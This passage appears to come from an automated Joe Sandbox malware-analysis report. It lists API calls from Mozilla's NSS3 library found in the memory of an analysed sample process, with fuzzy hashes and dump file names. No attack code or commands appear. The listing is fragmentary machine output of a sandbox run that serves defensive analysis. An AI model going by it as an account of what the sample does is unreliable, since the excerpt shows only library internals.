                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                            • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_Verify), ref: 6CB97CB6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB97CE4
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB97CF3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB97D09
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB97D2A
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB97D45
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CB97D5E
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CB97D77
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                                                                                                                                                            • API String ID: 1003633598-3278097884
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC2CC7B), ref: 6CC2CD7A
                                                                                                                                                                                                                              • Part of subcall function 6CC2CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CB9C1A8,?), ref: 6CC2CE92
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CDA5
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CDB8
                                                                                                                                                                                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CC2CDDB
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CD8E
                                                                                                                                                                                                                              • Part of subcall function 6CB505C0: PR_EnterMonitor.NSS3 ref: 6CB505D1
                                                                                                                                                                                                                              • Part of subcall function 6CB505C0: PR_ExitMonitor.NSS3 ref: 6CB505EA
                                                                                                                                                                                                                            • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CC2CDE8
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CDFF
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CE16
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CE29
                                                                                                                                                                                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CC2CE48
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                            • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                            • API String ID: 601260978-871931242
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CC713BC,?,?,?,6CC71193), ref: 6CC71C6B
                                                                                                                                                                                                                            • PR_NewLock.NSS3(?,6CC71193), ref: 6CC71C7E
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,6CC71193), ref: 6CC71C91
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CB521BC), ref: 6CB4BB8C
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,6CC71193), ref: 6CC71CA7
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB4BBEB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CB4BBFB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: GetLastError.KERNEL32 ref: 6CB4BC03
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CB4BC19
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: free.MOZGLUE(00000000), ref: 6CB4BC22
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,6CC71193), ref: 6CC71CBE
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CC71193), ref: 6CC71CD4
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CC71193), ref: 6CC71CFE
                                                                                                                                                                                                                            • PR_Lock.NSS3(?,?,?,?,?,?,?,6CC71193), ref: 6CC71D1A
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB51A48), ref: 6CC29BB3
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB51A48), ref: 6CC29BC8
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CC71193), ref: 6CC71D3D
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,6CC71193), ref: 6CC71D4E
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CC71193), ref: 6CC71D64
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CC71193), ref: 6CC71D6F
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CC71193), ref: 6CC71D7B
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CC71193), ref: 6CC71D87
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CC71193), ref: 6CC71D93
                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(00000000,?,?,6CC71193), ref: 6CC71D9F
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,6CC71193), ref: 6CC71DA8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3246495057-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CBC5EC0,00000000,?,?), ref: 6CBC5CBE
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CBC5CD7
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CBC5CF0
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CBC5D09
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CBC5EC0,00000000,?,?), ref: 6CBC5D1F
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CBC5D3C
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC5D51
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC5D66
                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CBC5D80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                            • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CC91DE0,?), ref: 6CBC6CFE
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC6D26
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CBC6D70
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000480), ref: 6CBC6D82
                                                                                                                                                                                                                            • DER_GetInteger_Util.NSS3(?), ref: 6CBC6DA2
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBC6DD8
                                                                                                                                                                                                                            • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CBC6E60
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CBC6F19
                                                                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CBC6F2D
                                                                                                                                                                                                                            • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CBC6F7B
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBC7011
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CBC7033
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC703F
                                                                                                                                                                                                                            • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CBC7060
                                                                                                                                                                                                                            • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CBC7087
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CBC70AF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2108637330-0
                                                                                                                                                                                                                            • Opcode ID: 125c32ba3ab29159ba078e04b2a941f56115b91411b529dd94210842c6ce7a19
                                                                                                                                                                                                                            • Instruction ID: dbc4ce0889716bf02d73cb0850ca48c7a530b1cd223ed97e84ba4eefc04f507a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 125c32ba3ab29159ba078e04b2a941f56115b91411b529dd94210842c6ce7a19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46A1F7B1B082C19BEB009F24DC85F7B32A4DB8131CF24893AE959DBA91E775D845C753
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDADB1
                                                                                                                                                                                                                              • Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44
                                                                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CBDADF4
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CBDAE08
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBDAE25
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3 ref: 6CBDAE63
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBDAE4D
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDAE93
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBDAECC
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3 ref: 6CBDAEDE
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6CBDAEE6
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBDAEF5
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6CBDAF16
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                            • String ID: security
                                                                                                                                                                                                                            • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                            • Opcode ID: ecea14e7e0557eae322bfe799908813723b4c6767160191abe1d69ead70a8c1e
                                                                                                                                                                                                                            • Instruction ID: fba2e9c0b11dc359c5e129a967a4584c97557f954de2c02f7aa9bd0289733b07
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecea14e7e0557eae322bfe799908813723b4c6767160191abe1d69ead70a8c1e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2541F6B6904281A7EB215A249C45BBE32A8EF4171CF250525E815D6F81FB39A648CBD3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2BF0
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2C07
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2C1E
                                                                                                                                                                                                                              • Part of subcall function 6CBF2BE0: free.MOZGLUE(?,00000000,00000000,?,6CBF2A28,00000060,00000001), ref: 6CBF2C4A
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D0F
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D4E
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D62
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D85
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5D99
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5DFA
                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5E33
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBF5E3E
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBF5E47
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBF80C1), ref: 6CBF5E60
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CBFAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBF5E78
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5EB9
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5EF0
                                                                                                                                                                                                                            • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5F3D
                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CBFAAD4), ref: 6CBF5F4B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4273776295-0
                                                                                                                                                                                                                            • Opcode ID: bee2a79f14a03ee26db3f3bf5e4ff1ddce25b5a2868cc830c5b765028b4982a3
                                                                                                                                                                                                                            • Instruction ID: 8fa933a4615b0186595796494ef2a3d3916e1f49cce121cb1f8bbf734a1e8110
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bee2a79f14a03ee26db3f3bf5e4ff1ddce25b5a2868cc830c5b765028b4982a3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C71BFB4A00B419FD700CF24D884A96B7F5FF89308F148529E82E97B11EB31F959CB96
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?), ref: 6CB78E22
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB78E36
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78E4F
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,?,?,?), ref: 6CB78E78
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB78E9B
                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB78EAC
                                                                                                                                                                                                                            • PL_ArenaAllocate.NSS3(?,?), ref: 6CB78EDE
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB78EF0
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F00
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB78F0E
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CB78F39
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F4A
                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6CB78F5B
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB78F72
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB78F82
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1569127702-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAEDD56
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CAEDD7C
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CAEDE67
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CAEDEC4
                                                                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAEDECD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 2339628231-598938438
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CBAEE0B
                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
